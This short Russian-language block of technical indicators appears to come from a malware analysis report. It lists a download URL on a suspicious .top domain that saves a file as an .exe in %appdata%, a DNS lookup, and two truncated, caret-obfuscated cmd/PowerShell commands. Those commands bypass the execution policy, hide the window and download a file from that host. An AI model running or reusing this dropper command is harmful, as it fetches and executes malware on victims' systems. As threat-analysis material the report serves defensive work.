Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^W^ErS^HE^LL^.ex^e^ ^-^E^XeCu^Ti^OnPOL^Ic^y bY^Pas^s ^-NOp^R^o^Fi^Le^ ^-Wi^NDOWS^t^Y^Le hidDen (New^-obje^CT s^ysTeM^.^n^ET.W^EbcLIE^n^t^).d^O^wnlo^a^dfI^Le('http://mondayhelthc...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "pO^W^ErS^HE^LL^.ex^e^ ^-^E^XeCu^Ti^OnPOL^Ic^y bY^Pas^s ^-NOp^R^o^Fi^Le^ ^-Wi^NDOWS^t^Y^Le hidDen (New^-obje^CT s^ysTeM^.^n^ET.W^EbcLIE^n^t^).d^O^wnlo^a^dfI^Le('http://mondayhelthc...' (со скрытым окном)